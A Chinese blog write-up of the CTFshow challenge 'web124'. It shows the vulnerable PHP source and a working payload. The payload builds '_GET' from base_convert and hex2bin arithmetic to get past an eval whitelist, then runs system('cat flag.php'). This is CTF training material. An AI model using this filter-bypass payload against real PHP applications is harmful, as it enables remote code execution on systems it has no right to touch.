CTFshow 命令执行 web124

最新推荐文章于 2023-04-21 08:25:15 发布
最新推荐文章于 2023-04-21 08:25:15 发布
阅读量518 收藏 2
点赞数
分类专栏: CTFshow 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121758970
版权

目录

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 收集自网络
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-06 14:04:45

*/

error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

思路

讲下主要函数

base_convert  		#在任意进制之间转换数字。
hexdec 			 #把十六进制转换为十进制。
dechex 			#把十进制转换为十六进制。
hex2bin  		#把十六进制的字符串转换为ASCII码

构造$_GET 把参数逃逸出去

转成10进制 多转一层绕过过滤

<?php 

// 把 hex2bin转化为10进制
echo base_convert("hex2bin", 36, 16);   //37907361743
echo "<br>";
echo base_convert("8d3746fcf", 16, 36);  //hex2bin
echo "<br>";
//把_GET 先转为16进制再转为10进制
echo hexdec(bin2hex("_GET"));  //1598506324
echo "<br>";
echo base_convert("8d3746fcf", 16, 36)(dechex("1598506324"));  // 绕过过滤拿到 "_GET"
?>

题解

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat%20flag.php

$$pi{abs}($$pi{acos})  #相当于 $_GET['abs']($_GET['acos'])

总结

水题

Kradress
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3150
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 710
在RANDOM产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
ctfshow web入门web119-124
m0_62207170的博客
04-14 557
ctfshow web入门web119-124
ctf.show命令执行(web29-web124)
wanan的博客
08-31 4042
ctf.show命令执行(web29-web124)
[ctfshow]web入门——命令执行web118-web122+web124
ShenZ的博客
02-28 3560
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其,它通过修改注入语句的 payload 变量,来获取不同的信息,...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛Web题目,该题目重点在于理解PHP编程语言的变量循环取值机制。在CTF(Capture The Flag)比赛,参赛者通常需要解决各种...
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow 命令执行 web 29~124
shinygod的博客
02-22 428
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 2053
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
ctfshow学习记录-web入门(命令执行119-122&124
龟速更新的九某人
06-29 809
ctfshow学习记录-web入门(命令执行web119-122&124
CTFshow_web入门_命令执行(web29-web77、web118-web122、web124)
monster663的博客
02-02 1156
CTFshow web入门系列持续更新 web入门_命令执行 web29 上源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ er
ctfshow 命令执行 web29-web77 web118-122 web124 wp
mumuzi的博客
01-31 1646
芜湖
ctfshow【从0开始学web】29-124 命令执行
yzl_007的博客
10-10 926
ctfshow【从0开始学web】29-124 命令执行 ctfshow【从0开始学web】29-124 命令执行web29web30web31web32web33web34web35web36web37web38web39web40持续更新。。。 web29 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Mod
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 4145
CTFSHOW PHP特性篇 web123-150
CTF show WEB14
羽的博客
02-18 2768
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
ctfshow-web命令执行(web61-77;118-124)(Updating)
m0_50268414的博客
11-30 2703
ctfshow-web命令执行(web61-77;118-124) 文章目录ctfshow-web命令执行(web61-77;118-124)web66 print\_r(scandir())与highlight\_file()web68 includeweb69 exit() web66 print_r(scandir())与highlight_file() 题目描述 show_source('flag.php'); 该语句被过滤 题解 POST传入c=print_r(scandir(’/’)); 获得
ctfshow web入门命令执行
最新发布
09-05
在CTFweb入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用提供的信息,可以看到一些常见的双写绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值